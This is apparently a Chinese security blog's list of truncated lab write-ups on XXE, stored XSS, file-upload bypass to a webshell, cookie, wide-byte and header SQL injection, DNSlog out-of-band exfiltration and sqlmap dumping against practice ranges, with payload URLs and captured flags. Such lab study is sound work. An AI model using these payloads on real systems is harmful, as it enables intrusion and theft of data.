XXE 实体注入 好文推荐 https://xz.aliyun.com/t/3357#toc-0 https://cloud.tencent.com/developer/article/1690035 XXE 认识 XML 文档有自己的一个格式规范，这个格式规范是由一个叫做 DTD（document type definition） 的东西控制的，他就是长得下面这个样子 1 2 3 4 5 6 <message> <receiver>Myself</receiver> <sender>Someone</sender> <header>TheReminder</header> <msg>This is an amazing book</msg> </message> XXE(XML External Entity Injection) 全称为 XML 外部实体注入，从名字就能看出来，这是一个注入漏洞，注入的是什么？XM……

阅读全文

存储型XSS 0x00 写在前面 任何事情切忌脑壳铁， 多听、多看、多梳理才能快速构建自己的知识树 ， 因而提高自己的快速检索能力。 好文推荐 循序渐进理解：跨源跨域，再到 XSS 和 CSRF - 双猫 信息收集 fofa 进入 https://fofa.so 搜索网站地址 整理信息： 操作系统： windows Web容器： apache/2.4.23/(win32) 开发语言版本: php/5.4.45 cms 查询 开发调试工具 cms 指纹工具 这里说一下……

阅读全文

文件上传漏洞 http://59.63.200.79:8016/Pass-01/index.php 配置 burpsuite， 开启response 拦截 pass-01 前端验证绕过 核心思想： 拦截 response ， 删除前端功能模块。 拦截 response。 删除 96 行以后的 js 模块， 并放行。 获取图片地址， 使用 蚁剑 连接 1 2 3 http://59.63.200.79:8016/Pass-01/upload/webshell.php # flag_kezZYqSU.txt : zkaq{PpsG@-cImaU2cahL} pass-02 Content-Type方式绕过 上传，拦截，抓包，修改 content-type: text/php 为 content-type: image/jpeg 1 2 3 http://59.63.200.79:8016/Pass-02/upload/webshell.php……

阅读全文

偏移注入 cookie 注入是类似于 POST 或者 GET 传参方式的一种。在 post 或 get 传入参数被反制的时候，可以尝试使用 cookie 注入。 常见的修改 cookie 值的方式有以下几种 浏览器，开发者工具 ，console 控制台。 documents.cookie="id=171" documents.cookie="id="+escape("171 order by 11") 。 其中 escape 为 js 函数， 作用是进行 url 编码。 浏览器插件 burpsuite 抓包修改 access 数据库 access 本身没有库的概念， 更像是 表的集合 access 本……

阅读全文

SQL注入之 宽字节注入 http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1 利用原理： 利用数据库 支持的 多字节 编码特性， 将 转义符号 的 编码 ** 与编码** 顺位组合， 使 转义符号 失去原有的意义， 从而达到逃脱的目的。 这里 多字节 不一定是 双字节 如 （GBK）。 在其他字符集环境下，可能是其他字节， 例如 UTF-8 的三字节 。 在最左侧闭合逃脱的时候，可以使用 宽字节 方……

阅读全文

Head 注入 - X-Forwarded-For 注入 （XFF） 注意 burpsuite http 文件有自己的格式， HEAD 信息之间 不能有 空格。 X-Forwarded-For 单词不要写错。 X-Forwarded-For 在直接请求时，burpsuite 抓包中没有。 因此需要手工传入。 在每一步都需要仔细认真，切忌焦躁、贪多 ，事情往往就在最后一步事情平常心而导致失败。 使用 burpsuite 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /Pass-09/index.php HTTP/1.1 Host:……

阅读全文

SQL注入之 head 注入与引号绕过 http://injectx1.lab.aqlab.cn:81/Pass-07/index.php?action=show_codea 0x00 先说结论 使用 -- gg 比 --+ 更通用，GET 中 + 会转为 空格 但 POST 中不会 其他而言, HEAD 注入与参数注入利用方式差别不大。 目前看来 INSERT 最难利用的是在判断 字段 插入位置和值对应类型 。 使用 updatexml() 函数报错 xpath 由于 0x7e 是 ~ ，不属于xpath语法格式， 因此报出xpath语法错误。 0x01 分析代码……

阅读全文

掌控安全 SQL 注入靶场练习 - Dnslog 带外测试 dnslog 带外实现 依赖 UNC ， 因此只能在 Windows 下利用 利用 DNS 记录不存在时向上查询的工作模式实现带外攻击 不支持 load_file('http://host:port/1.txt') 模式， 否则用不着 dns 了。 OOB 带外中心思想 将本地数据 select ... 通过触发器 load_file( ... ) 将结果传递到外部（含文件）xx.dnslog.cn 0x00 先说结论 0x00.1 dnslog 结果只会缓存 10 个， 超过 10……

阅读全文

查询 MYSQL 数据库 系统库名、表名、字段名 SQL语句 注意: 由于 引号 的原因， 盲注时字符探测不能使用 字符 。 而应该使用 ASCII 进行转换。 0x01 数据库探测 0x01.1 数据库数量探测 1 2 3 -- 数据库数量探测 http://vulhub.example.com:81/Pass-10/index.php?id=1 AND (SELECT COUNT(*) FROM information_schema.SCHEMATA)=6 0x01.2 当前数据库名称探测 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 -- 查询当前数据库有多少张表 SELECT COUNT(*) FROM information_schema.`TABLES` WHERE TABLE_SCHEMA=database(); --……

阅读全文

掌控安全 SQL 注入靶场练习 - 时间盲注 SQL 时间盲注 0x01 使用 SQLMAP 工具 0x01.1 dump database 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 --current-db 执行结果 current database: 'kanwolongxia' 0x01.2 dump tables 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 -D kanwolongxia --tables 执行结果 Database: kanwolongxia [3 tables] +--------+ | user | | loflag | | news | +--------+ 3 tables: user, loflag, news 0x01.3 dump columns 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 -D kanwolongxia -T loflag --columns 执行结果 Database: kanwolongxia Table: loflag [2 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | flaglo | varchar(255) | | Id | int(11) | +--------+--------------+ 0x01.4 dump values 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 -D kanwolongxia -T loflag -C flaglo --dump 执行结果 Database: kanwolongxia Table: loflag [5 entries]……

阅读全文